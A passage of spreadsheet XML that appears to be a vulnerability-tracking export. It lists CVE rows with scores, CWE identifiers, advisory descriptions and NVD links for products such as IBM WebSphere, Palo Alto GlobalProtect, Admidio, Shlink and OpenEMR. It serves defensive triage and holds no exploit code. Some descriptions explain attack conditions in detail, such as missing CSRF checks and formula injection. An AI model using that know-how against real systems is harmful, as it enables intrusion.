      </c>
      <c r="C5318" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5318" s="5" t="inlineStr"/>
      <c r="F5318" s="5" t="inlineStr"/>
      <c r="G5318" s="5" t="inlineStr"/>
      <c r="H5318" s="5" t="inlineStr"/>
      <c r="I5318" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5318" s="5" t="inlineStr"/>
      <c r="K5318" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L5318" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in DernekPlus Website Template allows Account Footprinting.
This issue affects Website Template: through 10092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M5318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9161</t>
        </is>
      </c>
    </row>
    <row r="5319">
      <c r="A5319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9338</t>
        </is>
      </c>
      <c r="C5319" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5319" s="5" t="inlineStr"/>
      <c r="F5319" s="5" t="inlineStr"/>
      <c r="G5319" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H5319" s="5" t="inlineStr"/>
      <c r="I5319" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5319" s="5" t="inlineStr"/>
      <c r="K5319" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5319" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to trigger excessive resource consumption, potentially leading to reduced availability of the affected service.</t>
        </is>
      </c>
      <c r="M5319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9338</t>
        </is>
      </c>
    </row>
    <row r="5320">
      <c r="A5320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9667</t>
        </is>
      </c>
      <c r="C5320" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5320" s="5" t="inlineStr"/>
      <c r="F5320" s="5" t="inlineStr"/>
      <c r="G5320" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H5320" s="5" t="inlineStr"/>
      <c r="I5320" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5320" s="5" t="inlineStr"/>
      <c r="K5320" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5320" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to server-side request forgery (SSRF) that could allow a remote, unauthenticated attacker to cause the server to send outbound requests to arbitrary endpoints.</t>
        </is>
      </c>
      <c r="M5320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9667</t>
        </is>
      </c>
    </row>
    <row r="5321">
      <c r="A5321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5321" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7062</t>
        </is>
      </c>
      <c r="C5321" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5321" s="5" t="inlineStr"/>
      <c r="F5321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5321" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5321" s="5" t="inlineStr"/>
      <c r="I5321" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5321" s="5" t="inlineStr"/>
      <c r="K5321" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L5321" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) vulnerability has been identified in the H5P module `h5p-nodejs-library` by Lumi Education UG in versions up to and including 10.0.4. The library allows users to upload H5P content that contains malicious JavaScript. This code is then executed in the browsers of other users who view the affected H5P content.</t>
        </is>
      </c>
      <c r="M5321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7062</t>
        </is>
      </c>
    </row>
    <row r="5322">
      <c r="A5322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0297</t>
        </is>
      </c>
      <c r="C5322" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5322" s="5" t="inlineStr"/>
      <c r="F5322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5322" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H5322" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I5322" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5322" s="5" t="inlineStr"/>
      <c r="K5322" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L5322" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability exists in the Palo Alto Networks GlobalProtect™ app that enables a man-in-the-middle (MitM) attacker or a rogue gateway to disrupt system processes and potentially execute arbitrary code with elevated privileges (SYSTEM privileges on Windows, and root privileges on macOS and Linux).</t>
        </is>
      </c>
      <c r="M5322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0297</t>
        </is>
      </c>
    </row>
    <row r="5323">
      <c r="A5323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0298</t>
        </is>
      </c>
      <c r="C5323" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5323" s="5" t="inlineStr"/>
      <c r="F5323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5323" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H5323" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I5323" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5323" s="5" t="inlineStr"/>
      <c r="K5323" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L5323" s="5" t="inlineStr">
        <is>
          <t>An improper input validation vulnerability exists in the Windows Pre-Logon Access Provider (PLAP) component of the Palo Alto Networks GlobalProtect™ app on Windows devices which enables a man-in-the-middle (MitM) attacker to execute arbitrary code with SYSTEM privileges on an affected client.
The GlobalProtect app on Linux, macOS, iOS, Android, and Chrome OS  is not affected.</t>
        </is>
      </c>
      <c r="M5323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0298</t>
        </is>
      </c>
    </row>
    <row r="5324">
      <c r="A5324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47228</t>
        </is>
      </c>
      <c r="C5324" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5324" s="5" t="inlineStr"/>
      <c r="F5324" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5324" s="5" t="inlineStr"/>
      <c r="H5324" s="5" t="inlineStr"/>
      <c r="I5324" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5324" s="5" t="inlineStr"/>
      <c r="K5324" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5324" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. `modules/registration.php` mode `send_login` regenerates a random password for `user_uuid_assigned`, stores its bcrypt hash in `adm_users.usr_password`, and emails the cleartext to that user. Every other state-changing mode in the same file (`assign_member`, `assign_user`, `delete_user`, `create_user`) calls `SecurityUtils::validateCsrfToken($_POST['adm_csrf_token'])` first; the `send_login` branch does not. Prior to version 5.0.10, page visited by a registration-administrator can issue the request as a top-level navigation, the browser sends the admin's `SameSite=Lax` cookies, and the server resets the chosen user's password without any further interaction from the admin. Version 5.0.10 fixes the issue.</t>
        </is>
      </c>
      <c r="M5324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47228</t>
        </is>
      </c>
    </row>
    <row r="5325">
      <c r="A5325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53760</t>
        </is>
      </c>
      <c r="C5325" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5325" s="5" t="inlineStr"/>
      <c r="F5325" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5325" s="5" t="inlineStr"/>
      <c r="H5325" s="5" t="inlineStr"/>
      <c r="I5325" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5325" s="5" t="inlineStr"/>
      <c r="K5325" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5325" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. In versions 5.0.11 and prior, the modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include SameSite=Lax session cookies. An attacker crafts a malicious page that, when an authenticated administrator visits it, triggers arbitrary plugin operations. The uninstall operation executes DROP TABLE SQL scripts and destroys plugin data. This issue has been patched via commit 056b1bd.</t>
        </is>
      </c>
      <c r="M5325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53760</t>
        </is>
      </c>
    </row>
    <row r="5326">
      <c r="A5326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85092</t>
        </is>
      </c>
      <c r="C5326" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5326" s="5" t="inlineStr"/>
      <c r="F5326" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5326" s="5" t="inlineStr"/>
      <c r="H5326" s="5" t="inlineStr"/>
      <c r="I5326" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5326" s="5" t="inlineStr"/>
      <c r="K5326" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5326" s="5" t="inlineStr">
        <is>
          <t>LiME through 1.12.0 fails to validate the disk acquisition output path and does not use O_NOFOLLOW when opening the operator-supplied path parameter, allowing unprivileged local users to overwrite arbitrary root-owned files. An attacker who controls the output directory can create a symbolic link with the expected filename pointing to any root-owned file, and when the acquisition runs in kernel context, LiME follows the link and truncates the target file with the memory acquisition stream.</t>
        </is>
      </c>
      <c r="M5326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85092</t>
        </is>
      </c>
    </row>
    <row r="5327">
      <c r="A5327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85454</t>
        </is>
      </c>
      <c r="C5327" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5327" s="5" t="inlineStr"/>
      <c r="F5327" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5327" s="5" t="inlineStr"/>
      <c r="H5327" s="5" t="inlineStr"/>
      <c r="I5327" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5327" s="5" t="inlineStr"/>
      <c r="K5327" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="L5327" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a buffer overflow vulnerability in CMOOSSerialPort::GetTelegram() that writes a NUL terminator one byte past the serial telegram stack buffer. Attackers controlling the serial line can send a full-length telegram to trigger the off-by-one write, corrupting the stack and potentially enabling code execution.</t>
        </is>
      </c>
      <c r="M5327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85454</t>
        </is>
      </c>
    </row>
    <row r="5328">
      <c r="A5328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85544</t>
        </is>
      </c>
      <c r="C5328" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="D5328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5328" s="5" t="inlineStr"/>
      <c r="F5328" s="5" t="inlineStr"/>
      <c r="G5328" s="5" t="inlineStr"/>
      <c r="H5328" s="5" t="inlineStr"/>
      <c r="I5328" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5328" s="5" t="inlineStr"/>
      <c r="K5328" s="5" t="inlineStr">
        <is>
          <t>CWE-1310</t>
        </is>
      </c>
      <c r="L5328" s="5" t="inlineStr">
        <is>
          <t>There is an Improper Encryption Configuration Vulnerability in some Hikvision Intercom Products. This could allow attackers to forge M1 cards.</t>
        </is>
      </c>
      <c r="M5328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85544</t>
        </is>
      </c>
    </row>
    <row r="5329">
      <c r="A5329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5329" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71404</t>
        </is>
      </c>
      <c r="C5329" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5329" s="5" t="inlineStr"/>
      <c r="F5329" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5329" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5329" s="5" t="inlineStr"/>
      <c r="I5329" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J5329" s="5" t="inlineStr"/>
      <c r="K5329" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5329" s="5" t="inlineStr">
        <is>
          <t>better-auth versions after v0.0.2 and before 1.1.16 contain a reflected cross-site scripting (XSS) vulnerability on the /api/auth/error page, where the value of the 'error' URL parameter is reflected as HTML without proper neutralization. An attacker who coerces a user into visiting a specially-crafted URL can execute arbitrary JavaScript in the context of the user's browser. The issue is fixed in version 1.1.16.</t>
        </is>
      </c>
      <c r="M5329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71404</t>
        </is>
      </c>
    </row>
    <row r="5330">
      <c r="A5330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11891</t>
        </is>
      </c>
      <c r="C5330" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5330" s="5" t="inlineStr"/>
      <c r="F5330" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5330" s="5" t="inlineStr"/>
      <c r="H5330" s="5" t="inlineStr"/>
      <c r="I5330" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5330" s="5" t="inlineStr"/>
      <c r="K5330" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5330" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.
This issue affects Valhall GPU Userspace Driver: from r46p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r46p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M5330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11891</t>
        </is>
      </c>
    </row>
    <row r="5331">
      <c r="A5331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12387</t>
        </is>
      </c>
      <c r="C5331" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5331" s="5" t="inlineStr"/>
      <c r="F5331" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5331" s="5" t="inlineStr"/>
      <c r="H5331" s="5" t="inlineStr"/>
      <c r="I5331" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5331" s="5" t="inlineStr"/>
      <c r="K5331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5331"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
        </is>
      </c>
      <c r="M5331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12387</t>
        </is>
      </c>
    </row>
    <row r="5332">
      <c r="A5332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18738</t>
        </is>
      </c>
      <c r="C5332" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5332" s="5" t="inlineStr"/>
      <c r="F5332" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5332" s="5" t="inlineStr"/>
      <c r="H5332" s="5" t="inlineStr"/>
      <c r="I5332" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5332" s="5" t="inlineStr"/>
      <c r="K5332" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5332" s="5" t="inlineStr">
        <is>
          <t>Shlink versions 5.0.0 through 5.1.5 contain a CSV formula injection vulnerability that allows unauthenticated remote attackers to plant spreadsheet formulas into exported visit data by supplying malicious values in User-Agent, Referer, or request path headers beginning with formula-triggering characters such as =, +, -, or @. Attackers can craft a single unauthenticated request against any short URL to embed DDE or WEBSERVICE formula payloads into CSV cells, which are then executed on an administrator's client machine when the exported CSV file is opened in a spreadsheet application that evaluates formulas.</t>
        </is>
      </c>
      <c r="M5332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18738</t>
        </is>
      </c>
    </row>
    <row r="5333">
      <c r="A5333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21099</t>
        </is>
      </c>
      <c r="C5333" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5333" s="5" t="inlineStr"/>
      <c r="F5333" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5333" s="5" t="inlineStr"/>
      <c r="H5333" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I5333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5333" s="5" t="inlineStr"/>
      <c r="K5333" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="L5333" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SettingsProvider prior to SMR Sep-2026 Release 1 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="M5333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21099</t>
        </is>
      </c>
    </row>
    <row r="5334">
      <c r="A5334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21106</t>
        </is>
      </c>
      <c r="C5334" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5334" s="5" t="inlineStr"/>
      <c r="F5334" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5334" s="5" t="inlineStr"/>
      <c r="H5334" s="5" t="inlineStr"/>
      <c r="I5334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5334" s="5" t="inlineStr"/>
      <c r="K5334" s="5" t="inlineStr">
        <is>
          <t>CWE-925</t>
        </is>
      </c>
      <c r="L5334" s="5" t="inlineStr">
        <is>
          <t>Improper verification of intent by broadcast receiver in Samsung Cloud Assistant prior to version 9.0.5 allows local attackers to disable enhanced data protection settings.</t>
        </is>
      </c>
      <c r="M5334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21106</t>
        </is>
      </c>
    </row>
    <row r="5335">
      <c r="A5335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21112</t>
        </is>
      </c>
      <c r="C5335" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5335" s="5" t="inlineStr"/>
      <c r="F5335" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5335" s="5" t="inlineStr"/>
      <c r="H5335" s="5" t="inlineStr"/>
      <c r="I5335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5335" s="5" t="inlineStr"/>
      <c r="K5335" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5335" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Samsung Tips prior to Android 17 allows local attackers to launch arbitrary activity with Samsung Tips privilege. User interaction is required for triggering this vulnerability.</t>
        </is>
      </c>
      <c r="M5335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21112</t>
        </is>
      </c>
    </row>
    <row r="5336">
      <c r="A5336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33387</t>
        </is>
      </c>
      <c r="C5336" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5336" s="5" t="inlineStr"/>
      <c r="F5336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5336" s="5" t="inlineStr"/>
      <c r="H5336" s="5" t="inlineStr"/>
      <c r="I5336" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5336" s="5" t="inlineStr"/>
      <c r="K5336" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L5336" s="5" t="inlineStr">
        <is>
          <t>A template injection vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated user with the required privileges can define a dashboard containing a malicious payload, or a victim can be socially engineered into importing a malicious dashboard. When the victim views or imports the dashboard, the payload executes in their browser context, allowing the attacker to modify application data or disrupt application availability.</t>
        </is>
      </c>
      <c r="M5336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33387</t>
        </is>
      </c>
    </row>
    <row r="5337">
      <c r="A5337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33920</t>
        </is>
      </c>
      <c r="C5337" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5337" s="5" t="inlineStr"/>
      <c r="F5337" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5337" s="5" t="inlineStr"/>
      <c r="H5337" s="5" t="inlineStr"/>
      <c r="I5337" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5337" s="5" t="inlineStr"/>
      <c r="K5337" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5337" s="5" t="inlineStr">
        <is>
          <t>A cross-site request forgery vulnerability was discovered in the login functionality (both standard and SAML) due to missing validation of the anti-CSRF token. An attacker with a valid account can trick a victim into unknowingly authenticating with the attacker's credentials. Any operation performed by the victim in this state is attributed to the attacker's account, compromising the integrity of the audit trail.</t>
        </is>
      </c>
      <c r="M5337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33920</t>
        </is>
      </c>
    </row>
    <row r="5338">
      <c r="A5338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40507</t>
        </is>
      </c>
      <c r="C5338" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5338" s="5" t="inlineStr"/>
      <c r="F5338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5338" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5338" s="5" t="inlineStr"/>
      <c r="I5338" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5338" s="5" t="inlineStr"/>
      <c r="K5338" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5338" s="5" t="inlineStr">
        <is>
          <t>OpenEMR before 8.3.0 contains a reflected cross-site scripting vulnerability in the patient portal template import handler. The templateHtml GET parameter is reflected into the page response without sanitization. An attacker can craft a URL that executes arbitrary JavaScript in the browser of any authenticated user with Forms Administration permissions who visits the link, enabling session hijacking.</t>
        </is>
      </c>
      <c r="M5338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40507</t>
        </is>
      </c>
    </row>
    <row r="5339">
      <c r="A5339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40508</t>
        </is>
      </c>
      <c r="C5339" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5339" s="5" t="inlineStr"/>
      <c r="F5339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5339" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5339" s="5" t="inlineStr"/>
      <c r="I5339" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5339" s="5" t="inlineStr"/>
      <c r="K5339" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5339" s="5" t="inlineStr">
        <is>
